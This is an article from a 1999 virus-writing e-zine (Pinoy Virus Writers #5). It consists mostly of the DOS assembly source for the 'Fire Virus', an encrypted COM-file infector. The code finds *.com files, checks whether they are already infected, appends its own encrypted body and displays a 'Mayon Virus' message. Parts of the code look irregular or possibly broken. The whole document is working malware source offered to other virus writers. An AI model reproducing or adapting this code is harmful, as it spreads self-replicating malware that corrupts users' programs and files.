ฤฤฤฤฤฤฤ[PVW5.014]ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ
Written for the : Pinoy Virus Writers E-Zine #5

                                % % % % %

                               - = %|% = -

 ษอออ   sOuRcEs !!!  ออออออออออออออออออออออออออออออออออออออออออป
 ศอออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออผ

  Fire Virus
  By : Lorz

  Use TASM & TLINK
  Simple Encryption
  COM infector
  
-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ--

  Fire Virus
  By : Lorz

  Use TASM & TLINK
  Simple Encryption
  Payload of a message
  COM Infector


filemask  db	'*.com'
lorz	db	'๑'
start:
	call 	decrypt
start_encrypt:
	mov	ah,4eh
findfile:
	mov     cx,07h
	lea	dx,filemask
	int 	21h
	mov     dx,9eh
        mov     ax,3d00h
        int     21h
        xchg    ax,bx
	mov     ah,3Fh
        mov     cx,01h
        mov     dx,offset lorz
        int     21h
	mov     ah,3eh
        int     21h
check:	
	mov     ah, 4Fh
        cmp     byte ptr[lorz],0e8h
        je      findfile
	cmp     word ptr cs:[9Ah],end-start
        jl      findfile
infect:
	mov     ah,2ch
        int     21h
        mov     key,dx
	mov     ah,40h
        push    ax
        mov     cx,vend-start
        push    cx
        mov     dx,start
        jmp     writefile
quitvirus:
        int     20h
writemessage:
        mov     ah,0fh
        int     10h
        xor     ah, ah
        int     10h
        mov     ah,01h
        mov     cx,2607h
        int     10h
        mov     ax,0b800h
        mov     es,ax
        mov     cx,815
        mov     si,offset fire
        xor     di,di

fire    db      '|-------------------------------------------------------------|',10,13,
        db      '|                                                             |',10,13,
        db      '|                 Pinoy Virus Writers ==== LORZ               |',10,13, 
        db      '|                         Mayon Virus                         |',10,13,
        db      '|-------------------------------------------------------------|',10,13,'$'

end_encrypt     equ     $ - 100
encrypt:
decrypt:
        mov     si,offset start
        mov     di,si
        mov     cx,(end_encrypt-start+1)/2+213
writefile:
        call    encrypt
        pop     cx
        pop     ax
        int     21h
        call    decrypt
xorLoop:
        lodsw
        jmp     ha
oi:
        stosw
        loop    xorLoop
        ret
key  
	dw      01010
        jnc     oi
ha:
        db      69h
vend:
end 	start

-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ--
(C) Pinoy Virus Writers 1999
Lorz213@mailcity.com
